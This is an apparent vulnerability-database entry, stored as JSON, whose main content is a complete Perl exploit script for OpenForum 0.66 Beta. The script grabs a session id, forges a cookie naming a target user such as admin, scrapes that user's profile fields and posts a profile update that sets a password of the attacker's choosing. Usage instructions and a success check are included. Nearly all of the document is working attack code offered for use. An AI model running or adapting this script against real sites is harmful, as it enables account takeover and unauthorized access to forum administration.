Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-10144", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-30T00:00:00", "title": "OpenForum 0.66 Beta Remote Reset Admin Password Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10144", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2008-11-30T00:00:00", "sourceData": "\n #!/usr/bin/perl -w\r\n#========================================================\r\n#OpenForum 0.66 Beta Remote Reset Admin Password Exploit\r\n#========================================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' |\t O\t .. CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 29 November 2008\r\n#SITE : cwh.citec.us\r\n#\r\n#\r\n#####################################################\r\n#APPLICATION : OpenForum\r\n#VERSION : 0.66 Beta\r\n#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip\r\n######################################################\r\n#######################################################################################\r\n#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK\r\n#Special Thx : asylu3, str0ke, citec.us, milw0rm.com\r\n#######################################################################################\r\n\r\nuse LWP;\r\nuse HTTP::Request;\r\nuse HTTP::Request::Common;\r\n\r\nprint "\\n==================================================\\n";\r\nprint " Openforum 0.66 beta Remote Reset Admin Password exploit \\n";\r\nprint " \\n";\r\nprint " Discovered By CWH Underground \\n";\r\nprint "==================================================\\n";\r\nprint " \\n";\r\nprint " ,--^----------,--------,-----,-------^--, \\n";\r\nprint " | ||||||||| `--------' | O \\n";\r\nprint " `+---------------------------^----------| \\n";\r\nprint " `\\_,-------, _________________________| \\n";\r\nprint " / XXXXXX /`| / \\n";\r\nprint " / XXXXXX / `\\ / \\n";\r\nprint " / XXXXXX /\\______( \\n";\r\nprint " / XXXXXX / \\n";\r\nprint " / XXXXXX / .. CWH Underground Hacking Team .. \\n";\r\nprint " (________( \\n";\r\nprint " `------' \\n";\r\nprint " \\n";\r\n\r\nif ($#ARGV ne 2) {\r\n\tprint "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\\n";\r\n\tprint "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\\n";\r\n\texit();\r\n}\r\n\r\n$url = $ARGV[0];\r\n$user = $ARGV[1];\r\n$newpass = $ARGV[2];\r\n\r\nif ($url !~ /^http:\\/\\//) {\r\n\t$url = "http://".$url;\r\n}\r\n\r\nprint "[+] Target url: ".$url."\\n\\n";\r\n\r\n$req = HTTP::Request->new (GET => $url);\r\n$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');\r\n$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');\r\n$req->header (Accept_Language => 'en-us,en;q=0.5');\r\n\r\n$ua = LWP::UserAgent->new;\r\n$response = $ua->request ($req);\r\n\r\nif ($response->code ne 200) {\r\n\tprint "Error: Could not request for index page\\n";\r\n\texit ();\r\n}\r\n\r\n$header = $response->headers->as_string;\r\n\r\n($sessid) = $header =~ /sessid=(.+)\\n/;\r\nprint ":: Retreive session id ::\\n";\r\nprint "[+] ".$sessid."\\n\\n";\r\n\r\n$url =~ s/index\\.php$/profile.php?user=$user/;\r\n\r\n#print $url;\r\n\r\n\r\n\r\n$req = HTTP::Request->new (GET => $url);\r\n$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');\r\n$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');\r\n$req->header (Accept_Language => 'en-us,en;q=0.5');\r\n$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user);\r\n\r\n$response = $ua->request ($req);\r\nif ($response->code ne 200) {\r\n\tprint "Error: Could not request for ".$user."'s profile page\\n";\r\n\texit ();\r\n}\r\n\r\n$content = $response->content;\r\n$update = "1";\r\n$adminaction = "";\r\n($email) = $content =~ /\\"email\\" value=\\"(.*?)\\"/;\r\n($signature) = $content =~ /\\"signature\\">(.*?)<\\/textarea>/;\r\n$day = "";\r\n$month = "";\r\n$year = "";\r\n($website) = $content =~ /\\"website\\" value=\\"(.*?)\\"/;\r\n($name) = $content =~ /\\"name\\" value=\\"(.*?)\\"/;\r\n($phone) = $content =~ /\\"phone\\" value=\\"(.*?)\\"/;\r\n($city) = $content =~ /\\"city\\" value=\\"(.*?)\\"/;\r\n($location) = $content =~ /\\"location\\" value=\\"(.*?)\\"/;\r\n$sytle = "";\r\n$submit = "Update!";\r\n\r\n\r\nprint ":: Update new password ::\\n\\n";\r\n$url =~ s/\\?user=admin//;\r\n\r\n\r\n$response = $ua->request (POST $url,\r\n\t\tUser_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18',\r\n\t\tAccept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',\r\n\t\tAccept_Language => 'en-us,en;q=0.5',\r\n\t\tCookie => 'sessid='.$sessid.'; userid='.$user,\r\n\t\tContent_Type => 'form-data',\r\n\t\tContent => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name,\r\n\t\t\t\tphone => $phone, city => $city, location => $location, password => $newpass, submit => $submit]\r\n);\r\n\r\nif ($response->code ne 200) {\r\n\tprint "Error: Could not request for profile page\\n";\r\n\texit ();\r\n}\r\n\r\n$content = $response->content;\r\n\r\nif ($content =~ /<br>updated<br><table width=\\"100%\\">/) {\r\n\tprint "[+] Exploit Success\\n";\r\n\tprint "[+] New admin's password: ".$newpass."\\n";\r\n}\r\nelse\r\n{\r\n\tprint "[+] Exploit Failed\\n";\r\n}\n ", "id": "SSV:10144", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:19:48", "reporter": "Root", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645477876}}
{}
OpenForum 0.66 Beta Remote Reset Admin Password Exploit